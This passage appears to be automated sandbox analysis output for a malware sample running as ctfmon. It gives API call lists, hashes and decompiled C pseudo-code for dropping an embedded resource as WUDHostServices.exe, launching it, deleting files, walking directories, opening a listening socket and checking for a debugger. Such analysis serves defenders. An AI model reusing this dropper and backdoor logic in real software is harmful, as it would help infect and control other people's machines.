                                                  • Part of subcall function 00964F50: GetStartupInfoA.KERNEL32(?), ref: 00964F8D
                                                  • Part of subcall function 00964F50: CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000020,00000000,0096985B,00000044,00000000,?,?,?,?,73BCF7E0,00000000), ref: 00964FBB
                                                • WaitForSingleObject.KERNEL32(00000000,00007530), ref: 0096986B
                                                • DeleteFileA.KERNEL32(?), ref: 0096989B
                                                • DeleteFileA.KERNEL32(?), ref: 009698A4
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.705573501.0000000000960000.00000040.00000400.00020000.00000000.sdmp, Offset: 00960000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_960000_ctfmon.jbxd
                                                Similarity
                                                • API ID: File$DeleteResource$Create$CloseDirectoryFindHandleInfoLoadLockObjectProcessSingleSizeofStartupSystemWaitWrite
                                                • String ID: %s\WUDHostServices.exe$%s\mkz.output$/LU5/$BIN
                                                • API String ID: 3567760449-3444193085
                                                • Opcode ID: 8866f364798aa7cded3d21711af2276211cc1b9d688dbccbb202df9f955dd1da
                                                • Instruction ID: 9eb5d47b4299e5edfab741c55322c4c288984e8c1d141ca6f1995d35ff9d12cd
                                                • Opcode Fuzzy Hash: 8866f364798aa7cded3d21711af2276211cc1b9d688dbccbb202df9f955dd1da
                                                • Instruction Fuzzy Hash: 233186B2D0431CABDB21EBA4DC4AFDA737CAB44704F0044E5B60DE7191DAB09F888B91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 92%
                                                			E00969D90(void* __eflags) {
                                                				char _v8;
                                                				char _v16;
                                                				intOrPtr _v20;
                                                				intOrPtr _v24;
                                                				signed char _v28;
                                                				struct _CRITICAL_SECTION _v52;
                                                				char _v56;
                                                				intOrPtr _v60;
                                                				intOrPtr _v64;
                                                				signed char _v68;
                                                				struct _CRITICAL_SECTION _v92;
                                                				char _v96;
                                                				intOrPtr _v100;
                                                				intOrPtr _v104;
                                                				signed char _v108;
                                                				struct _CRITICAL_SECTION _v132;
                                                				char _v136;
                                                				intOrPtr _v140;
                                                				intOrPtr _v144;
                                                				signed char _v148;
                                                				struct _CRITICAL_SECTION _v172;
                                                				char _v176;
                                                				intOrPtr _v180;
                                                				intOrPtr _v184;
                                                				signed char _v188;
                                                				struct _CRITICAL_SECTION _v212;
                                                				char _v216;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				signed int _t107;
                                                				intOrPtr _t118;
                                                				intOrPtr _t124;
                                                				intOrPtr _t126;
                                                				intOrPtr _t128;
                                                				intOrPtr _t130;
                                                				intOrPtr _t132;
                                                				signed char _t135;
                                                				signed char _t137;
                                                				signed char _t139;
                                                				signed char _t141;
                                                				signed char _t143;
                                                				intOrPtr _t159;
                                                				void* _t165;
                                                				signed char _t167;
                                                				intOrPtr _t184;
                                                				intOrPtr _t185;
                                                				intOrPtr _t186;
                                                				intOrPtr _t187;
                                                				intOrPtr _t188;
                                                				intOrPtr _t189;
                                                				intOrPtr _t190;
                                                				intOrPtr _t198;
                                                				void* _t199;
                                                				signed int _t200;
                                                				signed int _t204;
                                                				signed int _t205;
                                                				signed int _t206;
                                                				signed int _t207;
                                                				signed int _t208;
                                                				signed int _t211;
                                                				signed int _t212;
                                                				void* _t213;
                                                				void* _t214;
                                                				void* _t216;
                                                
                                                				_t216 = __eflags;
                                                				_push(0xffffffff);
                                                				_push(E00984781);
                                                				_push( *[fs:0x0]);
                                                				_t214 = _t213 - 0xc8;
                                                				_push(_t165);
                                                				_push(_t199);
                                                				_t107 =  *0x98f008; // 0x35554c2f
                                                				_push(_t107 ^ _t212);
                                                				 *[fs:0x0] =  &_v16;
                                                				_v216 = 0x98cbac;
                                                				InitializeCriticalSection( &_v212);
                                                				_v188 = 0;
                                                				_v184 = 0;
                                                				_v180 = 0;
                                                				_v8 = 0;
                                                				_v56 = 0x98cbac;
                                                				InitializeCriticalSection( &_v52);
                                                				_v28 = 0;
                                                				_v24 = 0;
                                                				_v20 = 0;
                                                				_v176 = 0x98cbac;
                                                				InitializeCriticalSection( &_v172);
                                                				_v148 = 0;
                                                				_v144 = 0;
                                                				_v140 = 0;
                                                				_v96 = 0x98cbac;
                                                				InitializeCriticalSection( &_v92);
                                                				_v68 = 0;
                                                				_v64 = 0;
                                                				_v60 = 0;
                                                				_v136 = 0x98cbac;
                                                				InitializeCriticalSection( &_v132);
                                                				_v108 = 0;
                                                				_v104 = 0;
                                                				_v100 = 0;
                                                				_v8 = 4;
                                                				E00969B40( &_v136,  &_v96);
                                                				E00969740(_t165,  &_v176,  &_v56, _t199);
                                                				E009698C0(_t165,  &_v216, _t199, _t216);
                                                				_t118 = _v24;
                                                				_t200 = 0;
                                                				if(_t118 != 0) {
                                                					_t189 = _v64;
                                                					asm("o16 nop [eax+eax]");
                                                					do {
                                                						_t167 = 0;
                                                						_t211 = 0;
                                                						if(_t189 == 0) {
                                                							L11:
                                                							_t190 = 0;
                                                							__eflags = _t200 - _t118;
                                                							if(__eflags < 0) {
                                                								_t190 =  *((intOrPtr*)(_v28 + _t200 * 4));
                                                							}
                                                							E00969A20(_t167, _t190, _t200, _t211, __eflags);
                                                							_t189 = _v64;
                                                						} else {
                                                							while(1) {
                                                								_t198 = 0;
                                                								if(_t200 < _t118) {
                                                									_t198 =  *((intOrPtr*)(_v28 + _t200 * 4));
                                                								}
                                                								_t159 = 0;
                                                								if(_t211 < _t189) {
                                                									_t159 =  *((intOrPtr*)(_v68 + _t211 * 4));
                                                								}
                                                								E00977612(_t200, _t211, _t159, _t198);
                                                								_t189 = _v64;
                                                								_t214 = _t214 + 8;
                                                								_t167 =  ==  ? 1 : _t167 & 0x000000ff;
                                                								_t211 = _t211 + 1;
                                                								if(_t211 >= _t189) {
                                                									break;
                                                								}
                                                								_t118 = _v24;
                                                							}
                                                							__eflags = _t167;
                                                							if(_t167 == 0) {
                                                								_t118 = _v24;
                                                								goto L11;
                                                							}
                                                						}
                                                						_t118 = _v24;
                                                						_t200 = _t200 + 1;
                                                						__eflags = _t200 - _t118;
                                                					} while (_t200 < _t118);
                                                				}
                                                				E00969CC0( &_v176, 0x995ba8);
                                                				E00969CC0( &_v136, 0x995ba8);
                                                				E00969CC0( &_v56, 0x995bd0);
                                                				E00969CC0( &_v216, 0x995bd0);
                                                				E00969CC0( &_v96, 0x995bd0);
                                                				_t124 = _v184;
                                                				_t204 = 0;
                                                				__eflags = _t124;
                                                				if(_t124 != 0) {
                                                					do {
                                                						_t188 = 0;
                                                						__eflags = _t204 - _t124;
                                                						if(_t204 < _t124) {
                                                							_t188 =  *((intOrPtr*)(_v188 + _t204 * 4));
                                                						}
                                                						_push(0x100);
                                                						E00970AA1(_t188);
                                                						_t124 = _v184;
                                                						_t204 = _t204 + 1;
                                                						_t214 = _t214 + 8;
                                                						__eflags = _t204 - _t124;
                                                					} while (_t204 < _t124);
                                                				}
                                                				_v184 = 0;
                                                				E00966EF0( &_v216);
                                                				_t126 = _v24;
                                                				_t205 = 0;
                                                				__eflags = _t126;
                                                				if(_t126 != 0) {
                                                					do {
                                                						_t187 = 0;
                                                						__eflags = _t205 - _t126;
                                                						if(_t205 < _t126) {
                                                							_t187 =  *((intOrPtr*)(_v28 + _t205 * 4));
                                                						}
                                                						_push(0x100);
                                                						E00970AA1(_t187);
                                                						_t126 = _v24;
                                                						_t205 = _t205 + 1;
                                                						_t214 = _t214 + 8;
                                                						__eflags = _t205 - _t126;
                                                					} while (_t205 < _t126);
                                                				}
                                                				_v24 = 0;
                                                				E00966EF0( &_v56);
                                                				_t128 = _v144;
                                                				_t206 = 0;
                                                				__eflags = _t128;
                                                				if(_t128 != 0) {
                                                					do {
                                                						_t186 = 0;
                                                						__eflags = _t206 - _t128;
                                                						if(_t206 < _t128) {
                                                							_t186 =  *((intOrPtr*)(_v148 + _t206 * 4));
                                                						}
                                                						_push(0x100);
                                                						E00970AA1(_t186);
                                                						_t128 = _v144;
                                                						_t206 = _t206 + 1;
                                                						_t214 = _t214 + 8;
                                                						__eflags = _t206 - _t128;
                                                					} while (_t206 < _t128);
                                                				}
                                                				_v144 = 0;
                                                				E00966EF0( &_v176);
                                                				_t130 = _v64;
                                                				_t207 = 0;
                                                				__eflags = _t130;
                                                				if(_t130 != 0) {
                                                					do {
                                                						_t185 = 0;
                                                						__eflags = _t207 - _t130;
                                                						if(_t207 < _t130) {
                                                							_t185 =  *((intOrPtr*)(_v68 + _t207 * 4));
                                                						}
                                                						_push(0x100);
                                                						E00970AA1(_t185);
                                                						_t130 = _v64;
                                                						_t207 = _t207 + 1;
                                                						_t214 = _t214 + 8;
                                                						__eflags = _t207 - _t130;
                                                					} while (_t207 < _t130);
                                                				}
                                                				_v64 = 0;
                                                				E00966EF0( &_v96);
                                                				_t132 = _v104;
                                                				_t208 = 0;
                                                				__eflags = _t132;
                                                				if(_t132 != 0) {
                                                					asm("o16 nop [eax+eax]");
                                                					do {
                                                						_t184 = 0;
                                                						__eflags = _t208 - _t132;
                                                						if(_t208 < _t132) {
                                                							_t184 =  *((intOrPtr*)(_v108 + _t208 * 4));
                                                						}
                                                						_push(0x100);
                                                						E00970AA1(_t184);
                                                						_t132 = _v104;
                                                						_t208 = _t208 + 1;
                                                						_t214 = _t214 + 8;
                                                						__eflags = _t208 - _t132;
                                                					} while (_t208 < _t132);
                                                				}
                                                				_v104 = 0;
                                                				E00966EF0( &_v136);
                                                				_v136 = 0x98cbac;
                                                				DeleteCriticalSection( &_v132);
                                                				_t135 = _v108;
                                                				__eflags = _t135;
                                                				if(_t135 != 0) {
                                                					L00975A36(_t135);
                                                					_t214 = _t214 + 4;
                                                				}
                                                				_v96 = 0x98cbac;
                                                				DeleteCriticalSection( &_v92);
                                                				_t137 = _v68;
                                                				__eflags = _t137;
                                                				if(_t137 != 0) {
                                                					L00975A36(_t137);
                                                					_t214 = _t214 + 4;
                                                				}
                                                				_v176 = 0x98cbac;
                                                				DeleteCriticalSection( &_v172);
                                                				_t139 = _v148;
                                                				__eflags = _t139;
                                                				if(_t139 != 0) {
                                                					L00975A36(_t139);
                                                					_t214 = _t214 + 4;
                                                				}
                                                				_v56 = 0x98cbac;
                                                				DeleteCriticalSection( &_v52);
                                                				_t141 = _v28;
                                                				__eflags = _t141;
                                                				if(_t141 != 0) {
                                                					L00975A36(_t141);
                                                					_t214 = _t214 + 4;
                                                				}
                                                				_v216 = 0x98cbac;
                                                				DeleteCriticalSection( &_v212);
                                                				_t143 = _v188;
                                                				__eflags = _t143;
                                                				if(_t143 != 0) {
                                                					_t143 = L00975A36(_t143);
                                                				}
                                                				 *[fs:0x0] = _v16;
                                                				return _t143;
                                                			}

                                                0x0096a060
                                                0x0096a062
                                                0x0096a064
                                                0x0096a069
                                                0x0096a069
                                                0x0096a06c
                                                0x0096a072
                                                0x0096a077
                                                0x0096a07a
                                                0x0096a07b
                                                0x0096a07e
                                                0x0096a07e
                                                0x0096a060
                                                0x0096a085
                                                0x0096a08c
                                                0x0096a091
                                                0x0096a094
                                                0x0096a096
                                                0x0096a098
                                                0x0096a09a
                                                0x0096a0a0
                                                0x0096a0a0
                                                0x0096a0a2
                                                0x0096a0a4
                                                0x0096a0a9
                                                0x0096a0a9
                                                0x0096a0ac
                                                0x0096a0b2
                                                0x0096a0b7
                                                0x0096a0ba
                                                0x0096a0bb
                                                0x0096a0be
                                                0x0096a0be
                                                0x0096a0a0
                                                0x0096a0c8
                                                0x0096a0cf
                                                0x0096a0de
                                                0x0096a0e8
                                                0x0096a0ea
                                                0x0096a0ed
                                                0x0096a0ef
                                                0x0096a0f2
                                                0x0096a0f7
                                                0x0096a0f7
                                                0x0096a0fd
                                                0x0096a105
                                                0x0096a107
                                                0x0096a10a
                                                0x0096a10c
                                                0x0096a10f
                                                0x0096a114
                                                0x0096a114
                                                0x0096a11d
                                                0x0096a128
                                                0x0096a12a
                                                0x0096a130
                                                0x0096a132
                                                0x0096a135
                                                0x0096a13a
                                                0x0096a13a
                                                0x0096a140
                                                0x0096a148
                                                0x0096a14a
                                                0x0096a14d
                                                0x0096a14f
                                                0x0096a152
                                                0x0096a157
                                                0x0096a157
                                                0x0096a160
                                                0x0096a16b
                                                0x0096a16d
                                                0x0096a173
                                                0x0096a175
                                                0x0096a178
                                                0x0096a17d
                                                0x0096a183
                                                0x0096a191

                                                APIs
                                                • InitializeCriticalSection.KERNEL32(73B76490,35554C2F), ref: 00969DD2
                                                • InitializeCriticalSection.KERNEL32(?), ref: 00969E04
                                                • InitializeCriticalSection.KERNEL32(?), ref: 00969E2C
                                                • InitializeCriticalSection.KERNEL32(?), ref: 00969E57
                                                • InitializeCriticalSection.KERNEL32(?), ref: 00969E7C
                                                  • Part of subcall function 00969B40: new.LIBCMT ref: 00969BAB
                                                  • Part of subcall function 00969740: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 009697A9
                                                  • Part of subcall function 00969740: DeleteFileA.KERNEL32(?), ref: 009697EF
                                                  • Part of subcall function 00969740: DeleteFileA.KERNEL32(?), ref: 009697F8
                                                  • Part of subcall function 00969740: FindResourceA.KERNEL32(00000000,00000065,BIN), ref: 00969803
                                                  • Part of subcall function 00969740: SizeofResource.KERNEL32(00000000,00000000,77109EB0), ref: 00969817
                                                  • Part of subcall function 00969740: LoadResource.KERNEL32(00000000,00000000), ref: 00969822
                                                  • Part of subcall function 00969740: LockResource.KERNEL32(00000000), ref: 00969829
                                                  • Part of subcall function 00969740: WaitForSingleObject.KERNEL32(00000000,00007530), ref: 0096986B
                                                  • Part of subcall function 009698C0: new.LIBCMT ref: 009699A6
                                                • DeleteCriticalSection.KERNEL32(?), ref: 0096A0E8
                                                • DeleteCriticalSection.KERNEL32(?), ref: 0096A105
                                                • DeleteCriticalSection.KERNEL32(?), ref: 0096A128
                                                • DeleteCriticalSection.KERNEL32(?), ref: 0096A148
                                                • DeleteCriticalSection.KERNEL32(73B76490), ref: 0096A16B
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.705573501.0000000000960000.00000040.00000400.00020000.00000000.sdmp, Offset: 00960000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_960000_ctfmon.jbxd
                                                Similarity
                                                • API ID: CriticalSection$Delete$Initialize$Resource$File$DirectoryFindLoadLockObjectSingleSizeofSystemWait
                                                • String ID: /LU5/
                                                • API String ID: 2718288186-937868281
                                                • Opcode ID: 54e65ad23ef13ea313e3bfd57c33b0e8f8f67a11fe2c8d05dd9f0f6c26c33f23
                                                • Instruction ID: 6861dc5187aa0d70ed1f647f581977882d3bb96d9f452191f296fb6c30f1c9ab
                                                • Opcode Fuzzy Hash: 54e65ad23ef13ea313e3bfd57c33b0e8f8f67a11fe2c8d05dd9f0f6c26c33f23
                                                • Instruction Fuzzy Hash: 1BB13D71E002299FDF24EFA4C895B9EB7F9AF44304F4141A9E849B7241EB719E44CFA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 71%
                                                			E0096AA40(void* __ebx, intOrPtr* __ecx, intOrPtr __edx, void* __edi) {
                                                				signed int _v12;
                                                				short _v536;
                                                				char _v1056;
                                                				struct _WIN32_FIND_DATAW _v1648;
                                                				signed int _v1649;
                                                				intOrPtr _v1656;
                                                				void* __esi;
                                                				signed int _t32;
                                                				signed int _t36;
                                                				signed int _t37;
                                                				WCHAR* _t38;
                                                				signed int _t43;
                                                				signed int _t44;
                                                				signed int _t46;
                                                				signed int _t50;
                                                				signed int _t51;
                                                				WCHAR* _t55;
                                                				void* _t62;
                                                				intOrPtr* _t64;
                                                				char* _t67;
                                                				char* _t70;
                                                				void* _t74;
                                                				signed int _t75;
                                                				signed int _t76;
                                                				signed int _t77;
                                                				signed int _t78;
                                                				intOrPtr* _t80;
                                                				void* _t81;
                                                				signed int _t82;
                                                				void* _t83;
                                                				void* _t84;
                                                				void* _t85;
                                                				void* _t86;
                                                
                                                				_t32 =  *0x98f008; // 0x35554c2f
                                                				_v12 = _t32 ^ _t82;
                                                				_v1656 = __edx;
                                                				_t80 = __ecx;
                                                				E00973440(__ecx,  &_v536, 0, 0x208);
                                                				_t64 = _t80;
                                                				_t84 = _t83 + 0xc;
                                                				_t74 = _t64 + 2;
                                                				do {
                                                					_t36 =  *_t64;
                                                					_t64 = _t64 + 2;
                                                				} while (_t36 != 0);
                                                				_t81 = wsprintfW;
                                                				_push(_t80);
                                                				_t37 = _t36 & 0xffffff00 |  *((short*)(_t80 + (_t64 - _t74 >> 1) * 2 - 2)) == 0x0000005c;
                                                				_v1649 = _t37;
                                                				_t38 =  &_v536;
                                                				if(_t37 == 0) {
                                                					_push(L"%ws\\*");
                                                				} else {
                                                					_push(L"%ws*");
                                                				}
                                                				wsprintfW(_t38, ??);
                                                				_t85 = _t84 + 0xc;
                                                				_t62 = FindFirstFileW( &_v536,  &_v1648);
                                                				if(_t62 != 0xffffffff) {
                                                					do {
                                                						_t67 = ".";
                                                						_t43 =  &(_v1648.cFileName);
                                                						while(1) {
                                                							_t75 =  *_t43;
                                                							__eflags = _t75 -  *_t67;
                                                							if(_t75 !=  *_t67) {
                                                								break;
                                                							}
                                                							__eflags = _t75;
                                                							if(_t75 == 0) {
                                                								L12:
                                                								_t44 = 0;
                                                							} else {
                                                								_t78 =  *((intOrPtr*)(_t43 + 2));
                                                								_t17 =  &(_t67[2]); // 0x2e0000
                                                								__eflags = _t78 -  *_t17;
                                                								if(_t78 !=  *_t17) {
                                                									break;
                                                								} else {
                                                									_t43 = _t43 + 4;
                                                									_t67 =  &(_t67[4]);
                                                									__eflags = _t78;
                                                									if(_t78 != 0) {
                                                										continue;
                                                									} else {
                                                										goto L12;
                                                									}
                                                								}
                                                							}
                                                							L14:
                                                							__eflags = _t44;
                                                							if(_t44 != 0) {
                                                								_t70 = L"..";
                                                								_t50 =  &(_v1648.cFileName);
                                                								while(1) {
                                                									_t76 =  *_t50;
                                                									__eflags = _t76 -  *_t70;
                                                									if(_t76 !=  *_t70) {
                                                										break;
                                                									}
                                                									__eflags = _t76;
                                                									if(_t76 == 0) {
                                                										L20:
                                                										_t51 = 0;
                                                									} else {
                                                										_t77 =  *((intOrPtr*)(_t50 + 2));
                                                										_t20 =  &(_t70[2]); // 0x2e
                                                										__eflags = _t77 -  *_t20;
                                                										if(_t77 !=  *_t20) {
                                                											break;
                                                										} else {
                                                											_t50 = _t50 + 4;
                                                											_t70 =  &(_t70[4]);
                                                											__eflags = _t77;
                                                											if(_t77 != 0) {
                                                												continue;
                                                											} else {
                                                												goto L20;
                                                											}
                                                										}
                                                									}
                                                									L22:
                                                									__eflags = _t51;
                                                									if(_t51 != 0) {
                                                										__eflags = _v1648.dwFileAttributes & 0x00000010;
                                                										if((_v1648.dwFileAttributes & 0x00000010) != 0) {
                                                											E00973440(_t80,  &_v1056, 0, 0x208);
                                                											_t86 = _t85 + 0xc;
                                                											__eflags = _v1649;
                                                											_push( &(_v1648.cFileName));
                                                											_push(_t80);
                                                											_t55 =  &_v1056;
                                                											if(__eflags == 0) {
                                                												_push(L"%ws\\%ws");
                                                											} else {
                                                												_push(L"%ws%ws");
                                                											}
                                                											wsprintfW(_t55, ??);
                                                											E0096A970(_t62, _t80, __eflags, _v1656,  &_v1056);
                                                											_t85 = _t86 + 0x18;
                                                										}
                                                									}
                                                									goto L28;
                                                								}
                                                								asm("sbb eax, eax");
                                                								_t51 = _t50 | 0x00000001;
                                                								__eflags = _t51;
                                                								goto L22;
                                                							}
                                                							goto L28;
                                                						}
                                                						asm("sbb eax, eax");
                                                						_t44 = _t43 | 0x00000001;
                                                						__eflags = _t44;
                                                						goto L14;
                                                						L28:
                                                						_t46 = FindNextFileW(_t62,  &_v1648);
                                                						__eflags = _t46;
                                                					} while (_t46 != 0);
                                                					FindClose(_t62);
                                                					__eflags = _v12 ^ _t82;
                                                					return E00970A5D(_v12 ^ _t82, _t81);
                                                				} else {
                                                					return E00970A5D(_v12 ^ _t82, _t81);
                                                				}
                                                			}


                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.705573501.0000000000960000.00000040.00000400.00020000.00000000.sdmp, Offset: 00960000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_960000_ctfmon.jbxd
                                                Similarity
                                                • API ID: FileFindFirstwsprintf
                                                • String ID: %ws%ws$%ws*$%ws\%ws$%ws\*$/LU5/
                                                • API String ID: 2655791690-3347939045
                                                • Opcode ID: a5ec9d26f53de050e5478afb7f3001ba51602c395596192ea95ab5db18414f7d
                                                • Instruction ID: 1912ad5f6da927605c8bf60431a93d12a8c9a18ab0e7fa638a6fa6b9ad4e26c6
                                                • Opcode Fuzzy Hash: a5ec9d26f53de050e5478afb7f3001ba51602c395596192ea95ab5db18414f7d
                                                • Instruction Fuzzy Hash: 6641F6719002189ADB24AB70DD46FFA737EEF61314F4445E6D90DE6281E732DA84CF62
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • socket.WS2_32(00000002,00000001,00000000), ref: 00968ED9
                                                • htons.WS2_32(?), ref: 00968F14
                                                • htonl.WS2_32(00000000), ref: 00968F29
                                                • bind.WS2_32(?,?,00000010), ref: 00968F3E
                                                • listen.WS2_32(?,00000005), ref: 00968F50
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.705573501.0000000000960000.00000040.00000400.00020000.00000000.sdmp, Offset: 00960000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_960000_ctfmon.jbxd
                                                Similarity
                                                • API ID: bindhtonlhtonslistensocket
                                                • String ID: /LU5/
                                                • API String ID: 3517227109-937868281
                                                • Opcode ID: f0cd78e20bf69fc677bade96694aa0e6c3e9abdaec64c1d486a408c8955f4e37
                                                • Instruction ID: f75c79892e96749bfdf26fe7fe61eebfc94d426ef4bcc8c56b0f8e0dc81e6d81
                                                • Opcode Fuzzy Hash: f0cd78e20bf69fc677bade96694aa0e6c3e9abdaec64c1d486a408c8955f4e37
                                                • Instruction Fuzzy Hash: D811A375A10309EBDB10DFB4DC0ABAFB7B4EF44310F11426AE815EB251EB719A04EB84
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 78%
                                                			E00975A46(intOrPtr __ebx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                				char _v0;
                                                				signed int _v8;
                                                				intOrPtr _v524;
                                                				intOrPtr _v528;
                                                				void* _v532;
                                                				intOrPtr _v536;
                                                				char _v540;
                                                				intOrPtr _v544;
                                                				intOrPtr _v548;
                                                				intOrPtr _v552;
                                                				intOrPtr _v556;
                                                				intOrPtr _v560;
                                                				intOrPtr _v564;
                                                				intOrPtr _v568;
                                                				intOrPtr _v572;
                                                				intOrPtr _v576;
                                                				intOrPtr _v580;
                                                				intOrPtr _v584;
                                                				char _v724;
                                                				intOrPtr _v792;
                                                				intOrPtr _v800;
                                                				char _v804;
                                                				intOrPtr _v808;
                                                				char _v812;
                                                				signed int _t40;
                                                				char* _t47;
                                                				intOrPtr _t49;
                                                				intOrPtr _t61;
                                                				intOrPtr _t62;
                                                				intOrPtr _t66;
                                                				intOrPtr _t67;
                                                				int _t68;
                                                				intOrPtr _t69;
                                                				signed int _t70;
                                                
                                                				_t69 = __esi;
                                                				_t67 = __edi;
                                                				_t66 = __edx;
                                                				_t61 = __ebx;
                                                				_t40 =  *0x98f008; // 0x35554c2f
                                                				_t41 = _t40 ^ _t70;
                                                				_v8 = _t40 ^ _t70;
                                                				if(_a4 != 0xffffffff) {
                                                					_push(_a4);
                                                					E00971623(_t41);
                                                					_pop(_t62);
                                                				}
                                                				E00973440(_t67,  &_v804, 0, 0x50);
                                                				E00973440(_t67,  &_v724, 0, 0x2cc);
                                                				_v812 =  &_v804;
                                                				_t47 =  &_v724;
                                                				_v808 = _t47;
                                                				_v548 = _t47;
                                                				_v552 = _t62;
                                                				_v556 = _t66;
                                                				_v560 = _t61;
                                                				_v564 = _t69;
                                                				_v568 = _t67;
                                                				_v524 = ss;
                                                				_v536 = cs;
                                                				_v572 = ds;
                                                				_v576 = es;
                                                				_v580 = fs;
                                                				_v584 = gs;
                                                				asm("pushfd");
                                                				_pop( *_t22);
                                                				_v540 = _v0;
                                                				_t25 =  &_v0; // 0x40000019
                                                				_t49 = _t25;
                                                				_v528 = _t49;
                                                				_v724 = 0x10001;
                                                				_v544 =  *((intOrPtr*)(_t49 - 4));
                                                				_v804 = _a8;
                                                				_v800 = _a12;
                                                				_v792 = _v0;
                                                				_t68 = IsDebuggerPresent();
                                                				SetUnhandledExceptionFilter(0);
                                                				_t36 =  &_v812; // 0x3ffffced
                                                				if(UnhandledExceptionFilter(_t36) == 0 && _t68 == 0 && _a4 != 0xffffffff) {
                                                					_push(_a4);
                                                					E00971623(_t57);
                                                				}
                                                				return E00970A5D(_v8 ^ _t70, _t69);
                                                			}

                                                APIs
                                                • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00975B3E
                                                • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00975B48
                                                • UnhandledExceptionFilter.KERNEL32(3FFFFCED,?,?,?,?,?,00000000), ref: 00975B55
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.705573501.0000000000960000.00000040.00000400.00020000.00000000.sdmp, Offset: 00960000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_960000_ctfmon.jbxd
                                                Similarity
                                                • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                • String ID: /LU5/
                                                • API String ID: 3906539128-937868281
                                                • Opcode ID: a9b7cc23dfeb6e635b421da7194f41e896ee1c676216d81c74437dbe1618bd44
                                                • Instruction ID: 6c1b7b131c28ef24793b13a71945ccf9e07420d74e384c5c26c08d5f2c793a69
                                                • Opcode Fuzzy Hash: a9b7cc23dfeb6e635b421da7194f41e896ee1c676216d81c74437dbe1618bd44
                                                • Instruction Fuzzy Hash: A031C47591121CABCB61DF68D88979DBBB8FF48310F5081EAE41CA7260E7709F858F45
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 72%
                                                			E0097B9D3(void* __ebx, void* __ecx, void* __edi, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16) {
                                                				intOrPtr _v8;
                                                				signed int _v12;
                                                				intOrPtr* _v32;
                                                				CHAR* _v36;
                                                				signed int _v48;
                                                				char _v286;
                                                				signed int _v287;
                                                				struct _WIN32_FIND_DATAA _v332;
                                                				intOrPtr* _v336;
                                                				signed int _v340;
                                                				signed int _v344;
                                                				intOrPtr _v372;
                                                				void* __esi;
                                                				signed int _t35;
                                                				signed int _t40;
                                                				signed int _t43;
                                                				intOrPtr _t45;
                                                				signed char _t47;
                                                				intOrPtr* _t55;
                                                				union _FINDEX_INFO_LEVELS _t57;
                                                				signed int _t62;
                                                				signed int _t65;
                                                				void* _t72;
                                                				void* _t74;
                                                				signed int _t75;
                                                				void* _t78;
                                                				CHAR* _t79;
                                                				intOrPtr* _t83;
                                                				intOrPtr _t85;
                                                				void* _t87;
                                                				intOrPtr* _t88;
                                                				signed int _t92;
                                                				signed int _t96;
                                                				void* _t101;
                                                				intOrPtr _t102;
                                                				signed int _t105;
                                                				union _FINDEX_INFO_LEVELS _t106;
                                                				void* _t110;
                                                				void* _t111;
                                                				intOrPtr _t112;
                                                				void* _t113;
                                                				void* _t114;
                                                				signed int _t118;
                                                				void* _t119;
                                                				signed int _t120;
                                                				void* _t121;
                                                				void* _t122;
                                                
                                                				_push(__ecx);
                                                				_t83 = _a4;
                                                				_t2 = _t83 + 1; // 0x1
                                                				_t101 = _t2;
                                                				do {
                                                					_t35 =  *_t83;
                                                					_t83 = _t83 + 1;
                                                				} while (_t35 != 0);
                                                				_push(__edi);
                                                				_t105 = _a12;
                                                				_t85 = _t83 - _t101 + 1;
                                                				_v8 = _t85;
                                                				if(_t85 <= (_t35 | 0xffffffff) - _t105) {
                                                					_push(__ebx);
                                                					_t5 = _t105 + 1; // 0x1
                                                					_t78 = _t5 + _t85;
                                                					_t111 = E009778D0(_t85, _t78, 1);
                                                					_t87 = _t110;
                                                					__eflags = _t105;
                                                					if(_t105 == 0) {
                                                						L6:
                                                						_push(_v8);
                                                						_t78 = _t78 - _t105;
                                                						_t40 = E0098071B(_t87, _t111 + _t105, _t78, _a4);
                                                						_t120 = _t119 + 0x10;
                                                						__eflags = _t40;
                                                						if(__eflags != 0) {
                                                							goto L9;
                                                						} else {
                                                							_t72 = E0097BC12(_a16, __eflags, _t111);
                                                							E00977848(0);
                                                							_t74 = _t72;
                                                							goto L8;
                                                						}
                                                					} else {
                                                						_push(_t105);
                                                						_t75 = E0098071B(_t87, _t111, _t78, _a8);
                                                						_t120 = _t119 + 0x10;
                                                						__eflags = _t75;
                                                						if(_t75 != 0) {
                                                							L9:
                                                							_push(0);
                                                							_push(0);
                                                							_push(0);
                                                							_push(0);
                                                							_push(0);
                                                							E00975C3D();
                                                							asm("int3");
                                                							_t118 = _t120;
                                                							_t121 = _t120 - 0x150;
                                                							_t43 =  *0x98f008; // 0x35554c2f
                                                							_v48 = _t43 ^ _t118;
                                                							_t88 = _v32;
                                                							_push(_t78);
                                                							_t79 = _v36;
                                                							_push(_t111);
                                                							_t112 = _v332.cAlternateFileName;
                                                							_push(_t105);
                                                							_v372 = _t112;
                                                							while(1) {
                                                								__eflags = _t88 - _t79;
                                                								if(_t88 == _t79) {
                                                									break;
                                                								}
                                                								_t45 =  *_t88;
